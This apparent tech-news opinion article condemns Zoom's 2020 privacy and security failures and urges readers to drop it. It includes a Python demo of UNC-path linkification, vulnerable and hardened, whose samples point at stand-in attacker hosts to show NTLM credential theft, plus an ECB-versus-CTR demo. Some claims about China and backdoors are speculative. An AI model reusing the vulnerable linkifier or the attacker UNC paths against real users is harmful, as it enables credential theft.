Zoom’s serious security breaches affect working from home


The Zoom CEO has responded to allegations (sorry, proven truths) of Zoom’s serious security breaches affecting people working from home. But do we believe him, or is he just buying time?

Our U.S. correspondent and security analyst Sam Bocetta has analysed the situation. He believes Zoom’s serious security breaches are not only cause for concern – you should ditch it now.

And since he started researching this, the truth has come out first-hand – Zoom is not to be trusted.

Sam writes about Zoom’s serious security breaches (this is a U.S. perspective)

If any company’s stock has zoom, zoom, zoomed (pun intended) as a result of the ongoing pandemic, it is Zoom’s video conferencing app. Share analysts say the surge is temporary, though. Why?

  • The lockdown that made Zoom more popular cannot last.
  • Reputable companies like Microsoft will soon include the vastly superior Teams free (family and friends version) in consumer versions of Microsoft 365.
  • Zoom has to convert free users to paid users. Who would pay for an insecure app that is inferior to mainstream paid apps?
  • And its shares are grossly overvalued with ‘stags’ cashing out now as they know the price won’t last.

The free app seemed the perfect solution for small businesses and enterprises alike. Daily meeting participants jumped from 10 million to 200 million as millions of people went home to isolate, self-quarantine and work.

But the share surge has been tempered by revelations that the app not only raises serious privacy concerns but also poses about as much difficulty to hackers as turning on a television.

Zoom CEO, Eric Yuan, has tried to get ahead of the public’s growing ill-will by apologising for the service’s shortcomings. He has laid out a strategy detailing how he plans to improve the situation. 

The trouble with Zoom’s serious security breaches

Zoom’s problems are two-fold: privacy and security. As if the general public wasn’t already suspicious enough of tech companies. Let’s take each in turn to get a sense of what we’re dealing with.


Privacy, Schmivacy

Zoom use has soared to stratospheric levels, driven by demand from managers looking for free tools to communicate with a newly stay-at-home workforce. Many of those managers (small businesses especially) lack the ability to assess issues like security. Worse, many can’t afford secure solutions, so they keep using it.

Reports quickly surfaced that the iOS version at least, without so much as a pardon me, embedded Facebook’s software development kit (SDK) and sent device data to Facebook every time the app was opened, whether or not the user had a Facebook account.


The bottom line is that a lot of personal data went to Zuckerberg’s behemoth, trust-less social media platform Facebook, which has had its share of public mea culpas too. The data included the user’s phone model and carrier, time zone, location/city, and unique advertiser identifier. Whether anything more was shared, such as information stored in the Zoom cloud, we just don’t know, and Zoom isn’t saying.

It’s also worth mentioning that nobody asked the phone owner whether this data collection was OK. I am pretty sure GDPR wouldn’t be OK with it either. And because Zoom is closed-source, no one outside the company can verify what the client is actually doing. I don’t take anyone’s word at face value.

NOTE – Several class-action lawsuits against Zoom under the new California Consumer Privacy Act resulted from this.

U.S. counterintelligence officials worry about one video conference platform in particular: Zoom.

It didn’t take long for the FBI and cybersecurity experts worldwide to sound the alarm. Google, NASA, SpaceX and government agencies in the U.S., Germany, Singapore, Taiwan and Australia, among a long list of others, have since barred employees from using Zoom.

One trusted acquaintance relayed the following to me, and I quote: 

“I was on a teleconference call last week with a Chinese company using Zoom for the first time. Malwarebytes started screaming that Zoom had installed a PUP (potentially unwanted program). It was tracking my internet use even after I ended the teleconference. I took screenshots and raised the matter with the company.

It responded, ‘We have the right to load tracking software on any device that has contact with us.’ No apology or any apparent concern.

It is a fact that the Zoom Windows client was vulnerable to UNC path injection. The chat window turned Windows network paths such as \\server\share into clickable links, and clicking one made Windows connect to the attacker’s server and hand over the user’s Windows credentials (username and NTLM password hash). The same link could point at a poisoned executable or image. Weak passwords can be cracked from the captured hash in as little as 16 seconds.
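To make the UNC flaw concrete, here is an added example (my code, not Zoom’s, and not a reconstruction of the real client): a chat-message linkifier written the vulnerable way, the hardened version beside it, and two small detection helpers for anyone triaging chat logs. The sample messages and the host names in them are constructed for the example.

```python
import re
from html import escape

# Constructed chat messages for the example (not taken from any real Zoom session).
SAMPLE_MESSAGES = [
    "Slides are here: https://example.com/deck.pdf",
    r"Grab the file from \\203.0.113.7\share\report.docx please",
    r"Try \\attacker.example\c$\putty.exe for the ssh client",
    "Plain text with no links at all",
]

# Only http(s) URLs should ever become clickable.
URL_RE = re.compile(r"https?://[^\s<>\"']+", re.IGNORECASE)
# A UNC path: two backslashes, a host, a backslash and a share/path. Group 1 is the host.
UNC_RE = re.compile(r"\\\\([A-Za-z0-9._-]+)\\[^\s<>\"']+")
# The vulnerable behaviour: treat UNC paths exactly like URLs.
URL_OR_UNC_RE = re.compile(f"(?:{URL_RE.pattern})|(?:{UNC_RE.pattern})", re.IGNORECASE)


def _render(message, pattern):
    """HTML-escape `message` and wrap every match of `pattern` in an <a> tag."""
    parts, pos = [], 0
    for m in pattern.finditer(message):
        parts.append(escape(message[pos:m.start()]))
        target = escape(m.group(0), quote=True)
        parts.append(f'<a href="{target}">{target}</a>')
        pos = m.end()
    parts.append(escape(message[pos:]))
    return "".join(parts)


def linkify_vulnerable(message):
    """Mirrors the flaw described above: \\\\host\\share becomes a clickable link, so one
    click makes Windows open an SMB connection and send NTLM credentials to `host`."""
    return _render(message, URL_OR_UNC_RE)


def linkify_hardened(message):
    """The fix: link http(s) URLs only. UNC paths stay as inert text."""
    return _render(message, URL_RE)


def find_unc_paths(message):
    """Detection helper: every UNC path in one message, for filtering or alerting."""
    return [m.group(0) for m in UNC_RE.finditer(message)]


def unc_hosts(messages):
    """Triage helper: sorted set of hosts that UNC paths in a chat log point at.
    Anything outside your own network is a candidate credential-harvesting server."""
    return sorted({m.group(1) for msg in messages for m in UNC_RE.finditer(msg)})


if __name__ == "__main__":
    for msg in SAMPLE_MESSAGES:
        print("vulnerable:", linkify_vulnerable(msg))
        print("hardened:  ", linkify_hardened(msg))
    print("UNC hosts seen:", unc_hosts(SAMPLE_MESSAGES))
```

The client-side fix is simply not to make UNC paths clickable. As defence in depth on managed Windows fleets, the group policy “Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers” stops the credential leak even if some other application does linkify a hostile path, and blocking outbound TCP 445 at the perimeter stops the SMB connection from leaving the network at all.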

Some Zoom traffic runs through Chinese servers – subject to the law of that country

Now might be a good time to point out that Citizen Lab found meetings between participants outside China being routed through servers in China, with the meeting encryption keys issued from there. Anything passing through those servers is subject to Chinese law. Does that make anyone excited to go out and bet their life on the company’s trustworthiness?


Did anyone even try to secure this thing?

Zoom is one of the millions of poorly or hastily written apps that try to cash in on trends. App security is perhaps the last thing amateur programmers worry about. Just ask Mark Zuckerberg, who wrote the first version of Facebook in PHP while at university. PHP is one of the fastest ‘quick and dirty’ scripting languages, and carelessly written PHP has historically been among the easiest code to hack. But it gets worse.

App writers (let’s not insult real programmers) use a grab bag of free, off-the-shelf SDKs (software development kits) and APIs (application programming interfaces) to cobble together an app that works. Security is an afterthought, as Zoom shows.

And if the app is free, they monetise your data by adding Facebook or other data sharing links.

Not to mention that Chinese developers must use government-sanctioned SDKs and APIs from Chinese Communist Party-controlled Tencent, Baidu, Alibaba and more. Backdoors – hell, even multiple front doors – abound.

If you have a few extra hours, all the recent Zoom security problems are listed here. For our purposes, let’s just hit the highlights.

Zoombombing and more

This one caught public attention due to the shock value and, of course, a catchy name. Zoombombing is when someone (not necessarily a hacker) joins a live meeting uninvited and does what trolls typically do: spread profanity, hate and pornography wherever they can. But Zoom also let your ‘boss’ covertly monitor you: until it was removed, the ‘attention tracking’ feature told the host whether each attendee had the Zoom window in focus.

An early Zoombombing incident saw an intruder join an online classroom and plaster swastikas across students’ screens. This caught the FBI’s attention and resulted in a public warning about Zoom’s security shortcomings.

It wasn’t long before a list of other bugs came to light:

  • Local attackers on a Mac able to piggyback on the Zoom client’s permissions and take control of the user’s microphone and webcam
  • Mac users finding that the Zoom installer behaved like malware, installing itself without the usual consent click and exposing a path to root-level access
  • The promised ‘end-to-end’ encryption never existed: Zoom used transport encryption that it could decrypt itself, with AES-128 in ECB mode, a mode that leaks patterns in the plaintext

There are many security issues with streaming video and remote video conferencing in general, but Zoombombing and data exfiltration are undoubtedly the most critical problems here.
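Why does ECB mode matter for video? An added example (mine, not Zoom’s code, and standard-library only) shows it. A small Feistel block cipher stands in for AES so nothing needs installing; the point is the mode, not the cipher. A constructed ‘frame’ with a large flat background is encrypted in ECB and in CTR, and the fraction of repeated ciphertext blocks is measured: in ECB the repeated background shows straight through the encryption, in CTR it does not.

```python
import hashlib
import hmac

BLOCK = 16  # 128-bit blocks, the same block size as AES


def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def _round_function(key, round_no, half):
    # Keyed pseudo-random function for one Feistel round: 64-bit output.
    return hmac.new(key, bytes([round_no]) + half, hashlib.sha256).digest()[:BLOCK // 2]


def toy_block_encrypt(key, block, rounds=8):
    """Balanced Feistel network with an HMAC-SHA256 round function. A genuine (if slow)
    128-bit block cipher standing in for AES; the example is about the MODE, not the cipher."""
    assert len(block) == BLOCK
    left, right = block[:BLOCK // 2], block[BLOCK // 2:]
    for i in range(rounds):
        left, right = right, _xor(left, _round_function(key, i, right))
    return left + right


def toy_block_decrypt(key, block, rounds=8):
    assert len(block) == BLOCK
    left, right = block[:BLOCK // 2], block[BLOCK // 2:]
    for i in reversed(range(rounds)):
        left, right = _xor(right, _round_function(key, i, left)), left
    return left + right


def pkcs7_pad(data):
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


def pkcs7_unpad(data):
    return data[:-data[-1]]


def ecb_encrypt(key, plaintext):
    """ECB: each block is encrypted independently, so equal plaintext blocks give equal
    ciphertext blocks and the structure of the data shows through."""
    padded = pkcs7_pad(plaintext)
    return b"".join(toy_block_encrypt(key, padded[i:i + BLOCK]) for i in range(0, len(padded), BLOCK))


def ecb_decrypt(key, ciphertext):
    padded = b"".join(toy_block_decrypt(key, ciphertext[i:i + BLOCK]) for i in range(0, len(ciphertext), BLOCK))
    return pkcs7_unpad(padded)


def ctr_encrypt(key, nonce, plaintext):
    """CTR: encrypt nonce||counter to make a keystream and XOR it into the data. Equal
    plaintext blocks no longer give equal ciphertext blocks. The nonce must never repeat
    under one key; decryption is the same operation."""
    assert len(nonce) == BLOCK // 2
    out = bytearray()
    for counter, i in enumerate(range(0, len(plaintext), BLOCK)):
        keystream = toy_block_encrypt(key, nonce + counter.to_bytes(BLOCK // 2, "big"))
        out += _xor(plaintext[i:i + BLOCK], keystream)
    return bytes(out)


def repeated_block_ratio(ciphertext):
    """Fraction of ciphertext blocks that duplicate another block. 0.0 is what a good
    mode produces; anything noticeably above it is leaking plaintext structure."""
    blocks = [ciphertext[i:i + BLOCK] for i in range(0, len(ciphertext), BLOCK)]
    return 1 - len(set(blocks)) / len(blocks)


# Constructed stand-in for a video frame: flat background with one small object in the middle.
FRAME = bytes(BLOCK * 60) + b"\xaa\x55" * (BLOCK // 2) + bytes(BLOCK * 60)
KEY = hashlib.sha256(b"constructed example key, not a real one").digest()[:BLOCK]
NONCE = bytes(BLOCK // 2)  # fixed so the example is reproducible; use a fresh nonce per message in real code


if __name__ == "__main__":
    ecb = ecb_encrypt(KEY, FRAME)
    ctr = ctr_encrypt(KEY, NONCE, FRAME)
    print(f"ECB repeated-block ratio: {repeated_block_ratio(ecb):.3f}")
    print(f"CTR repeated-block ratio: {repeated_block_ratio(ctr):.3f}")
    assert ecb_decrypt(KEY, ecb) == FRAME
```

With the frame above, ECB repeats more than 97% of its ciphertext blocks, so an eavesdropper who cannot read a single pixel can still see where the background ends and the object begins. CTR (or, in real systems, an authenticated mode such as GCM) gives a repeated-block ratio of zero. Note that CTR here provides confidentiality only; production code also needs integrity protection, which is why GCM rather than bare CTR is the usual recommendation.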

OK, I’ve been beating up on Zoom for a while now. Let’s give Mr Yuan a chance for rebuttal.

He writes in a Zoom blog post: 

“We recognise that we have fallen short of the community’s and our privacy and security expectations. For that, I am deeply sorry, and I want to share what we are doing about it.”

For users already burned by tech giants’ privacy invasions, it doesn’t take much to send them scurrying to find secure alternatives. For those who keep an open mind, Yuan says he has a plan of action to address the problems.

However, Zoom has deep roots in China, even though it is headquartered in the U.S. and has been listed on the NASDAQ since April 2019. Yuan (Yuán Zhēng) was born in Tai’an, Shandong, and educated at Shandong University of Science and Technology. He:

  • moved to the U.S. in the mid-90s, after obtaining a visa on the ninth try.
  • learned his trade at WebEx, which Cisco bought in 2007.
  • founded Zoom in 2011.

Much of the software is developed by two Chinese companies, both known as Ruanshi Software and owned by Zoom. A third, more obscure Chinese company, American Cloud Video Software Technology, is also involved; its ownership is unclear.

90 Days to Maintain Trust

In any event, here’s the Zoom plan laid out by Yuan.

Yuan described a 90-day course of action that he says will lead to better processes for identifying and correcting the kind of troublesome issues recently encountered, and will return Zoom to a state that allows the company to “maintain your trust.”

Towards that end, you can expect:

  • An immediate freeze on new feature development to focus on fixing security and privacy concerns.
  • Third-party experts retained to review all issues, with the findings made transparent to the public.
  • Removal of the Facebook SDK (although he also said it would be reconfigured not to collect data – umm, which is it? Remove or reconfigure?).
  • An expanded bug bounty program.
  • A weekly webinar, hosted by Yuan, to update the Zoom community on progress.

So far, Zoom’s CEO has been adequately contrite, though to me it feels like the kid caught with his hand in the cookie jar. He begs forgiveness and returns the cookie. But you know he’ll be rooting in there again the moment you take your eye off it.

It will take both talk and action to maintain loyalty from the vast number of small and large businesses struggling to maintain an employer/employee relationship in the new remote work world.

GadgetGuy’s take:

Dump Zoom or Face Doom. Zoom’s serious security breaches are inexcusable.

OK, so you ask whether you should care about hacking or nation-state spying. Are you at risk? Yes, you are.

It is not just that an app or nation-state could steal Aunty Mame’s secret crochet stitch. It is what metadata and speech-to-text conversion of your conversation could reveal. This is dangerous as certain keywords can make you a target.

At best, it is just your approximate location (from your IP address) and that you like pilates and chocolates. But if that were ever added to your Facebook or dark web profile (not sure which is worse), you could be ad-bombed or targeted for subversion (yes, put on your tin hat for that).

At worst, you could be discussing trade secrets or business plans, going over budgets (shared on screen) or discussing your financial situation with an accountant. What if a hacker sold that information to a competitor? (They do; corporate espionage is big business.)

But Zoom is free – does it matter?

For every leak fixed, three more seem to emerge. The long list of security vulnerabilities was always going to catch up with Zoom. However, whether Yuan can talk his way out of the apparent links to China – a potential death sentence in the U.S. – remains to be seen.

At this point, if you’re one of the millions of people still using Zoom, you have two options.

One, keep using the app. If you do this, you must trust Yuan and friends that the laughably long list of larceny is nothing but an awful series of mistakes by software that was not ready for the major league. And you must believe that, free software or not, it will be fixed. Is that a pig flying past my window or a fat Easter Bunny?

Two, and this seems the obvious choice to me: find another app that does the same thing but does not steal data or create a fast lane for hackers and nation-states to cause mischief.

It all depends on your level of belief in Yuan’s sincerity.

We say ditch Zoom! Otherwise, you’re potentially opening your conversations up to hackers, or worse. The risk is that Zoom is just another garden variety, data-scraping tool masquerading as a useful service.

Choose now.